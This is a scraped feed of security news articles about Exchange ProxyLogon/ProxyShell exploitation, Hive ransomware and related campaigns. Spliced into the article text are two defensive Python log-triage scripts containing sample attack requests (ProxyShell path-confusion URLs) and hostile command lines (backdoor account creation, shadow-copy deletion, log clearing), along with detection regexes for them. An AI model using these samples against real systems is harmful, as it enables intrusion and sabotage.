purposes.\n\n[](<https://thehackernews.com/images/-_eUnJYSlv7A/YD86dcga76I/AAAAAAAAB7Y/Ex1kb11XGtcD6b878ASeDzA-SFz8SSzNgCLcBGAsYHQ/s0/ms.jpg>)\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can mitigate the issue by restricting untrusted connections or by using a VPN to separate the Exchange server from external access.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. 
But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) a [nmap plugin](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. 
Customers using a vulnerable version of Exchange Server are recommended to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", 
"CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. 
\n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. 
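The chain Varonis describes (web shell, PowerShell running as SYSTEM, a new backdoor administrator account, and later the shadow-copy deletion and event-log clearing that precede encryption) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the article or from Varonis: a Python triage of Sysmon- or 4688-style events that flags an Exchange IIS worker (w3wp.exe) spawning a shell, local account and Administrators-group changes, shadow-copy deletion, log clearing and encoded PowerShell. The events, hostnames, account names and the `Windows.exe` path are constructed for the example, and the rule patterns are illustrative rather than a complete detection set.

```python
"""Flag post-exploitation activity of the kind described in the Hive write-up in
Windows process-creation telemetry. Added example; events below are constructed."""
import re
from collections import Counter

# Constructed process-creation events in a Sysmon/4688-like shape (not telemetry from the incident)
EVENTS = [
    {"ts": "2022-03-01T03:12:04Z", "host": "EXCH01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": "cmd.exe /c powershell -nop -w hidden -enc "
                "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"ts": "2022-03-01T03:12:09Z", "host": "EXCH01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"ts": "2022-03-01T03:12:10Z", "host": "EXCH01", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "image": "C:\\Windows\\System32\\net.exe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"ts": "2022-03-03T01:40:00Z", "host": "FS02", "user": "CORP\\svc_backup",
     "parent": "C:\\Users\\svc_backup\\Windows.exe",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2022-03-03T01:40:02Z", "host": "FS02", "user": "CORP\\svc_backup",
     "parent": "C:\\Users\\svc_backup\\Windows.exe",
     "image": "C:\\Windows\\System32\\wevtutil.exe",
     "cmdline": "wevtutil.exe cl Security"},
    {"ts": "2022-03-03T01:41:00Z", "host": "FS02", "user": "NT AUTHORITY\\SYSTEM",
     "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
]

# Binaries an Exchange IIS worker process has no business spawning (illustrative, not exhaustive)
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe",
                  "certutil.exe", "rundll32.exe", "mshta.exe", "net.exe", "net1.exe"}

# Command-line patterns for the later stages of the intrusion (illustrative)
CMDLINE_RULES = {
    "local_account_created": re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "added_to_administrators": re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "shadow_copy_deletion": re.compile(
        r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy", re.I),
    "event_log_cleared": re.compile(r"wevtutil(?:\.exe)?\s+cl\b|Clear-EventLog", re.I),
    "encoded_powershell": re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return one finding per (event, rule) pair; an event can fire several rules."""
    findings = []
    for ev in events:
        parent, image = basename(ev["parent"]), basename(ev["image"])
        # A web shell executes as the IIS worker, so w3wp.exe is the parent of the first shell
        if parent == "w3wp.exe" and image in SHELL_CHILDREN:
            findings.append({"rule": "webshell_exec", **ev})
        for rule, rx in CMDLINE_RULES.items():
            if rx.search(ev["cmdline"]):
                findings.append({"rule": rule, **ev})
    return findings


def by_host(findings):
    """Count findings per host so the analyst sees where the chain ran."""
    return Counter(f["host"] for f in findings)


if __name__ == "__main__":
    hits = triage(EVENTS)
    for f in hits:
        print(f["ts"], f["host"], f["rule"], f["cmdline"])
    print(dict(by_host(hits)))
```

Run against real telemetry, the interesting join is the one the incident shows: a `webshell_exec` on the Exchange server followed within minutes by account creation under the same SYSTEM context, then the same new account appearing as the actor on other hosts.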
Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities, patched in April and May this year, including attacks that deploy LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities let adversaries bypass access controls and elevate privileges on the Exchange PowerShell backend, which in combination permits unauthenticated remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two flaws that can be chained 
to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed deployed to vulnerable Microsoft Exchange servers, with over 100 incidents related to the exploit reported between August 17 and 18. The web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchange servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjiGzDP_Q8TgakrIFP6H8c0NlSHHH4ztdEtesv8G-AaS-LvfiauO6JgcrFpPKfplpRuqYssvepWzyhQaLMIPqPzyt00vE0kNEL3qEg1k1YRQpWZouKa_km8jD-kuKbNBXugV_MhYndYW41kM6o2z77T4oOGQlDGhGk-HA0tZfdol-RO_fCE6o7N54uW>)\n\nThreat actors are exploiting ProxyLogon and ProxyShell exploits in unpatched Microsoft 
Exchange Servers as part of an ongoing spam campaign that leverages stolen email chains to bypass security software and deploy malware on vulnerable systems.\n\nThe findings come from Trend Micro following an investigation into a number of intrusions in the Middle East that culminated in the distribution of a previously undocumented loader dubbed SQUIRRELWAFFLE. First publicly [documented](<https://thehackernews.com/2021/10/hackers-using-squirrelwaffle-loader-to.html>) by Cisco Talos, the attacks are believed to have commenced in mid-September 2021 via malicious Microsoft Office documents.\n\n\"It is known for sending its malicious emails as replies to pre-existing email chains, a tactic that lowers a victim's guard against malicious activities,\" researchers Mohamed Fahmy, Sherif Magdy, and Abdelrhman Sharshar [said](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) in a report published last week. \"To be able to pull this off, we believe it involved the use of a chain of both ProxyLogon and ProxyShell exploits.\"\n\n[ProxyLogon](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) and [ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>) refer to two sets of flaws in Microsoft Exchange Server that let a threat actor elevate privileges and remotely execute arbitrary code, effectively granting the ability to take control of vulnerable machines. 
While the ProxyLogon flaws were addressed in March, the ProxyShell bugs were fixed in Exchange updates released in April and May, with the CVEs disclosed in May and July.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhYwBTFRq5MuslNIXJAtZNZ-q9Ik0Wyu_z6HVG8loZsBaeJR_tXRLvm18OZvIJYeeOyYp0DVHZdMg8sdqe9H3ePEot8dMGuNuC25YWuyp09kuYsm_qh2nU_3dlFK7X2kVXn-DYmtklqChAj_2BOpas4TFiWcbPR3PtoX5RKukcpGn0sd1S8Ubdqo1bu>) \n--- \nDLL infection flow \n \nTrend Micro said it observed the use of public exploits for CVE-2021-26855 (ProxyLogon), CVE-2021-34473, and CVE-2021-34523 (ProxyShell) on three Exchange servers compromised in different intrusions. The attackers used that access to hijack legitimate email threads and send malicious spam messages as replies, increasing the likelihood that unsuspecting recipients would open the emails.\n\n\"Delivering the malicious spam using this technique to reach all the internal domain users will decrease the possibility of detecting or stopping the attack, as the mail gateways will not be able to filter or quarantine any of these internal emails,\" the researchers said, adding that the attackers did not carry out lateral movement or install additional malware so as to stay under the radar and avoid triggering any alerts.\n\nThe attack chain involves rogue email messages containing a link that, when clicked, drops a Microsoft Excel or Word file. 
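The ProxyLogon and ProxyShell reports on this page (Beaumont's nmap build check, NCC Group's web shell in /aspnet_client/, the web shells Huntress counted, and Trend Micro's observation of public exploits for CVE-2021-26855, CVE-2021-34473 and CVE-2021-34523) all come down to request patterns that an Exchange server's own IIS logs record. The following is an added example, not code from any of the articles or vendors: a Python triage of IIS W3C logs that flags the Autodiscover path-confusion requests used by CVE-2021-34473, the X-Rps-CAT PowerShell backend token used by CVE-2021-34523, and requests to .aspx pages in directories where no legitimate page lives. The log lines, IP addresses and file names are constructed, and the allowlist of /owa/auth/ pages is illustrative; treat it as a starting point for a hunt, not a complete signature set.

```python
"""Triage IIS W3C logs from an on-premises Exchange server for ProxyShell request
patterns and web-shell activity. Added example; the log below is constructed."""
from collections import Counter
from urllib.parse import unquote

# Constructed IIS log (not a real capture). Field order follows the #Fields line.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-08-13 10:01:02 10.0.0.5 GET /owa/auth/logon.aspx url=https://mail.example.test/owa/ 443 - 198.51.100.20 Mozilla/5.0 200
2021-08-13 10:01:09 10.0.0.5 GET /autodiscover/autodiscover.json @evil.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 203.0.113.7 python-requests/2.25.1 200
2021-08-13 10:01:15 10.0.0.5 POST /autodiscover/autodiscover.json @evil.test/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9z&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 203.0.113.7 python-requests/2.25.1 200
2021-08-13 10:02:40 10.0.0.5 POST /aspnet_client/Ck2qwvJh.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2021-08-13 10:03:01 10.0.0.5 POST /owa/auth/Current/themes/resources/help.aspx - 443 - 203.0.113.7 Mozilla/5.0 200
2021-08-13 10:05:00 10.0.0.5 GET /ecp/default.aspx - 443 EXAMPLE\\admin 10.0.0.9 Mozilla/5.0 200
2021-08-13 10:06:13 10.0.0.5 POST /owa/auth.owa - 443 - 198.51.100.20 Mozilla/5.0 302
"""

# Legitimate .aspx pages under /owa/auth/ (illustrative allowlist, not exhaustive)
KNOWN_OWA_AUTH_PAGES = {"logon.aspx", "logoff.aspx", "errorfe.aspx", "signout.aspx", "timeout.aspx"}


def parse_w3c(text):
    """Parse an IIS W3C extended log into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            rows.append(dict(zip(fields, line.split())))
    return rows


def suspicious_aspx(stem):
    """True for .aspx requests in places where Exchange serves no legitimate page."""
    s = stem.lower()
    if not s.endswith(".aspx"):
        return False
    if s.startswith("/aspnet_client/") or s.startswith("/owa/auth/current/"):
        return True  # static-resource directories; a page here is a drop location
    return s.startswith("/owa/auth/") and s.rsplit("/", 1)[-1] not in KNOWN_OWA_AUTH_PAGES


def triage_iis_log(text):
    """Return one finding per (request, rule) pair, in log order."""
    findings = []
    for row in parse_w3c(text):
        stem = row["cs-uri-stem"].lower()
        query = unquote(row["cs-uri-query"]).lower()
        hits = []
        # CVE-2021-34473 path confusion: Autodiscover request whose query starts with '@'
        # or smuggles a second 'autodiscover.json?@' through the Email parameter
        if stem.endswith("/autodiscover/autodiscover.json") and (
                query.startswith("@") or "autodiscover.json?@" in query):
            hits.append("proxyshell_path_confusion")
        # CVE-2021-34523: forged PowerShell backend access token in the X-Rps-CAT parameter
        if "x-rps-cat=" in query:
            hits.append("proxyshell_powershell_token")
        if suspicious_aspx(stem):
            hits.append("suspicious_aspx")
        for rule in hits:
            findings.append({"rule": rule, "c-ip": row["c-ip"], "uri": row["cs-uri-stem"],
                             "time": f'{row["date"]} {row["time"]}'})
    return findings


def attacker_ips(findings):
    """Count findings per client address to pivot from one hit to the whole session."""
    return Counter(f["c-ip"] for f in findings)


if __name__ == "__main__":
    hits = triage_iis_log(SAMPLE_LOG)
    for f in hits:
        print(f["time"], f["c-ip"], f["rule"], f["uri"])
    print(dict(attacker_ips(hits)))
```

On a production server the same logic runs over the files under `%SystemDrive%\inetpub\logs\LogFiles\W3SVC1`; the first `proxyshell_path_confusion` hit from an address, followed by a `.aspx` request from the same address, is the sequence the Huntress and NCC observations describe.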
Opening the document, in turn, prompts the recipient to enable macros, ultimately leading to the download and execution of the SQUIRRELWAFFLE malware loader, which acts as a medium to fetch final-stage payloads such as Cobalt Strike and Qbot.\n\nThe development marks a new escalation in phishing campaigns where a threat actor has breached corporate Microsoft Exchange email servers to gain unauthorized access to their internal mail systems and distribute malicious emails in an attempt to infect users with malware.\n\n\"SQUIRRELWAFFLE campaigns should make users wary of the different tactics used to mask malicious emails and files,\" the researchers concluded. \"Emails that come from trusted contacts may not be enough of an indicator that whatever link or file included in the email is safe.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-22T11:47:00", "type": "thn", "title": "Hackers Exploiting ProxyLogon and ProxyShell Flaws in Spam Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-11-23T07:33:36", "id": "THN:0D80EEB03C07D557AA62E071C7A7C619", "href": "https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. 
